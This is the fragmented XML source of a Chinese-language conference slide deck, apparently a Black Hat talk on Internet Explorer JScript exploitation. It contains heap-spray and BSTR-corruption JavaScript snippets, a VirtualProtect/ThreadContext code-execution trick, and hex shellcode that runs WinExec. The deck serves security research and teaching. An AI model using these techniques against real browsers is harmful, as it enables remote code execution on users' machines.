          <a:ext cx="4709864" cy="2974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9864"/>
              </a:tblGrid>
              <a:tr h="594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Pointer to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="594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lpAddress</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="594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dwSize</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="594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PAGE_EXECUTE_READWRITE</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="5949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 smtClean="0"/>
                        <a:t>lpflOldProtect</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" alt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40400" y="124402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altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ThreadContext.Esp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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2200" y="4678740"/>
            <a:ext cx="1059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因为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode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地址已知，同时又可在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>中用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GetProcAddress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获取函数地址，所以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode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中常见的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GetPC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ReadPEB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GetKernel32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 等代码都不再必要，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这种 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 几乎无法识别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07200" y="2181326"/>
            <a:ext cx="5029200" cy="2314474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 WINAPI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VirtualProtect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LPVOID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SIZE_T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dwSize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DWORD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flNewProtect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PDWORD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lpflOldProtect</a:t>
            </a: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跨维交互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18360" y="1219200"/>
          <a:ext cx="7560840" cy="50460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20281"/>
                <a:gridCol w="144016"/>
                <a:gridCol w="72008"/>
                <a:gridCol w="72008"/>
                <a:gridCol w="475252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Dimension 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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Dimension 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0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Native</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0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Script</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0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zh-CN" sz="2400" b="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OpenProcess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     = …</a:t>
                      </a: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algn="l"/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var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DeviceIoControl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 = …</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/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339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0x????????</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="00FF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scArr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>[0] = </a:t>
                      </a:r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OpenProcess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0x????????</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="00FF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scArr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>[1] = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>DeviceIoControl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zh-CN" altLang="en-US" sz="2400" b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33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2400" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00FF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zh-CN" altLang="en-US" sz="24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2055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call [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1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 - 4]</a:t>
                      </a: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push</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" baseline="0" dirty="0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b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="00FF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zh-CN" sz="2400" b="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zh-CN" sz="2400" b="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  <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>scArr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>[?] =</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="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0x50</a:t>
                      </a:r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0455FF</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" baseline="0" dirty="0" smtClean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652657" y="4377447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594225" y="5403691"/>
            <a:ext cx="12041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FF5504</a:t>
            </a:r>
          </a:p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50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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 语言写 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode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200" y="1348603"/>
            <a:ext cx="11582400" cy="489979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PointerTable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FARPROC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FARPROC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ExitProcess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char   *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szath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ShellCode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(void) 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PointerTable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pt;</a:t>
            </a:r>
          </a:p>
          <a:p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asm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ebp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0xAAAAAAAA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pt.WinExec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pt.szath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SW_SHOWNORMAL );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pt.ExitProcess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 维度</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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1200" y="1348603"/>
            <a:ext cx="11582400" cy="4530465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ShellCode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00000000: 55          push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ebp</a:t>
            </a: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00000001: 8BEC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ebp,esp</a:t>
            </a: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00000003: 83EC0C      sub    esp,0x0C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00000006: BD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AAAAAAAA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ebp,0xAAAAAAAA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0000000B: 6A01        push   1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0000000D: FF75FC      push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[ebp-4]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00000010: FF55F4      call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[ebp-0x0C]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00000013: 6A00        push   0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00000015: FF55F8      call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dword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[ebp-8]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00000018: C9          leave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00000019: C3          ret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21000" y="5932986"/>
            <a:ext cx="9458200" cy="46781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558BEC83EC0CBD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AAAAAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6A01FF75FCFF55F46A00FF55F8C9C3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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脚本维度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200" y="1131671"/>
            <a:ext cx="11582400" cy="526912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GetProcAddress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(kernel32,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");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WinExec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ExitProcess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ptArr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strCalcAddr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"558BEC83EC0CBD" +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numToHexStr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ptArrAddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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+ 0x0C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"6A01FF75FCFF55F46A00FF55F8C9C3";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writeHexStrToArr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esp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 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scArrAddr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            // return address</a:t>
            </a:r>
            <a:b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[esp+1]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makeAlign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scArrAddr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[esp+2] = 0x4000;               // size</a:t>
            </a:r>
            <a:b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[esp+3] = 0x40;                 // RWE flag</a:t>
            </a:r>
          </a:p>
          <a:p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[esp+4]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stackArrAddr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跨维交互执行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ym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>脚本维度 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>维度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不依赖任何固定偏移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完全通用，和软件、系统版本无关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不止可用于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，也不止可用于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Windows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92200" y="12700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ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>“While you do not know life, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0">
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0">
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>can you know about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0">
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>death?”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122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1092200" y="4064000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ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>While you do not know attack, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0">
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0">
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>can you know about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0">
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>defense?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/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9448800" y="1285875"/>
            <a:ext cx="2006600" cy="2794181"/>
            <a:chOff x="7109048" y="1244228"/>
            <a:chExt cx="2006600" cy="2793642"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 2" descr="http://upload.jsntv.com.cn/2012/1007/1349597703129.jpg?dur=4295"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect l="18370" t="2699" r="23434" b="36635"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7109048" y="1244228"/>
              <a:ext cx="2006600" cy="231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7109048" y="3545522"/>
              <a:ext cx="2006600" cy="492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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="http://images2.makefive.com/images/entertainment/movies/best-movie-villain/agent-smith-the-matrix-7.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="13983" r="12289" b="39847"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9440863" y="4064000"/>
            <a:ext cx="201453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006725" y="2514600"/>
            <a:ext cx="480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黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>“未知生，焉知死？”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3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3462337" y="5334000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未知攻，焉知防？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/>
              <a:t>了解你的敌人，超越你的敌人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 smtClean="0"/>
              <a:t>找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0" smtClean="0"/>
              <a:t> BSTR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>长度域前缀的地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="52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1501003"/>
            <a:ext cx="11582400" cy="489979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heapSpray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("\u0000");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var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0x14141414;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writeByVul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for (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0;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&lt;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strArr.length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++)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p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].search(/[^\u0000]/);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if (p != -1) {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modified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leverageStr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strArr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[modified];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bstrPrefixAddr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= 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sprayedAddr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- (p)*2 - 4;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    break;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    }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Consolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="新宋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4200" y="57912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altLang="zh-CN" sz="1800" kern="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Fermin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="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J. Serna, “The info leak era on software exploitation”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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68400" y="2448342"/>
            <a:ext cx="106320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75299">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" kern="100" dirty="0" smtClean="0"/>
              <a:t>从 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" smtClean="0"/>
              <a:t>IE9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" kern="100" dirty="0" smtClean="0"/>
              <a:t> 开始，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" smtClean="0"/>
              <a:t> 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" kern="100" dirty="0" smtClean="0"/>
              <a:t>取代了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" smtClean="0"/>
              <a:t> 5.8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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kern="100" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>而 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" kern="100" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>现在不再使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> BSTR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1743" y="3048000"/>
            <a:ext cx="98436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75299">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>很多攻击者转而使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Flash Vector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" kern="1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8584" y="2732782"/>
            <a:ext cx="10627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kern="100" dirty="0" smtClean="0"/>
              <a:t>但是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" smtClean="0"/>
              <a:t> 5.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" kern="100" dirty="0" smtClean="0"/>
              <a:t>还在系统里</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" kern="100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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kern="100" dirty="0" smtClean="0"/>
              <a:t>我们可以召唤它</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" kern="1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000" dirty="0" smtClean="0"/>
              <a:t>召唤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" dirty="0" smtClean="0"/>
              <a:t> 5.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0" smtClean="0"/>
              <a:t>的咒语</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="50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11200" y="1624590"/>
            <a:ext cx="11506200" cy="1575810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&lt;META http-equiv = "X-UA-Compatible" content = "IE=EmulateIE8"/&gt;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&lt;Script Language =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JScript.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Encode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"&gt;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&lt;/Script&gt;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1200" y="4062990"/>
            <a:ext cx="11506200" cy="1575810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tx1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
          <a:extLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="97530" tIns="48765" rIns="97530" bIns="48765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&lt;META http-equiv = "X-UA-Compatible" content = "IE=EmulateIE8"/&gt;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&lt;Script Language = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1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JScript.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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Compact</a:t>
            </a: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"&gt;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…</a:t>
            </a:r>
          </a:p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Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/Script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353920" y="5848290"/>
            <a:ext cx="578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1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altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JScript.Compact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 标记有些功能不支持，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="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kern="100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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5032" y="3285292"/>
            <a:ext cx="6480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52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800" kern="100" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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 Hat Abu Dhabi 2011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默认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Hat Abu Dhabi 2011.potx</Template>
  <TotalTime>0</TotalTime>
  <Words>2193</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>412</Paragraphs>
  <Slides>49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Black Hat Abu Dhabi 2011</vt:lpstr>
      <vt:lpstr>ROPs are for the 99%</vt:lpstr>
      <vt:lpstr>背景介绍</vt:lpstr>
      <vt:lpstr>关于 BSTR</vt:lpstr>
      <vt:lpstr>篡改 BSTR 长度域前缀</vt:lpstr>
      <vt:lpstr>找到 BSTR 长度域前缀的地址</vt:lpstr>
      <vt:lpstr>幻灯片 6</vt:lpstr>
      <vt:lpstr>幻灯片 7</vt:lpstr>
      <vt:lpstr>幻灯片 8</vt:lpstr>
      <vt:lpstr>召唤 JScript 5.8 的咒语</vt:lpstr>
      <vt:lpstr>幻灯片 10</vt:lpstr>
      <vt:lpstr>幻灯片 11</vt:lpstr>
      <vt:lpstr>幻灯片 12</vt:lpstr>
      <vt:lpstr>幻灯片 13</vt:lpstr>
      <vt:lpstr>JScript 9 String 对象 Spray</vt:lpstr>
      <vt:lpstr>数组，JScript 9 的 “BSTR”</vt:lpstr>
      <vt:lpstr>找到数组数据头部长度域的地址</vt:lpstr>
      <vt:lpstr>修改 JScript 9 数组数据头部长度域</vt:lpstr>
      <vt:lpstr>自动修改 JScript 9 数组对象</vt:lpstr>
      <vt:lpstr>JScript 9 实际上更便于漏洞利用</vt:lpstr>
      <vt:lpstr>一些新的对象</vt:lpstr>
      <vt:lpstr>留给大家的问题</vt:lpstr>
      <vt:lpstr>如何利用所有这些</vt:lpstr>
      <vt:lpstr>幻灯片 23</vt:lpstr>
      <vt:lpstr>幻灯片 24</vt:lpstr>
      <vt:lpstr>幻灯片 25</vt:lpstr>
      <vt:lpstr>幻灯片 26</vt:lpstr>
      <vt:lpstr>幻灯片 27</vt:lpstr>
      <vt:lpstr>JScript 对象中的 “SafeMode” 开关</vt:lpstr>
      <vt:lpstr>留给大家的问题</vt:lpstr>
      <vt:lpstr>幻灯片 30</vt:lpstr>
      <vt:lpstr>用 JavaScript “LoadLibrary”</vt:lpstr>
      <vt:lpstr>“点穴攻击”</vt:lpstr>
      <vt:lpstr>幻灯片 33</vt:lpstr>
      <vt:lpstr>function GetBaseAddrByPoiAddr()</vt:lpstr>
      <vt:lpstr>function GetModuleFromImport()</vt:lpstr>
      <vt:lpstr>function GetProcAddress()</vt:lpstr>
      <vt:lpstr>幻灯片 37</vt:lpstr>
      <vt:lpstr>NtContinue()</vt:lpstr>
      <vt:lpstr>struct _CONTEXT</vt:lpstr>
      <vt:lpstr>对象操作引发的调用</vt:lpstr>
      <vt:lpstr>一数两用</vt:lpstr>
      <vt:lpstr>伪造 ThreadContext 结构</vt:lpstr>
      <vt:lpstr>“跨维交互”</vt:lpstr>
      <vt:lpstr>用 C 语言写 Shellcode</vt:lpstr>
      <vt:lpstr>CPU 维度</vt:lpstr>
      <vt:lpstr>脚本维度</vt:lpstr>
      <vt:lpstr>“跨维交互执行”</vt:lpstr>
      <vt:lpstr>了解你的敌人，超越你的敌人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2014-08-21T15:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-08-21T23:37:44Z</dcterms:modified>
</cp:coreProperties>
</file>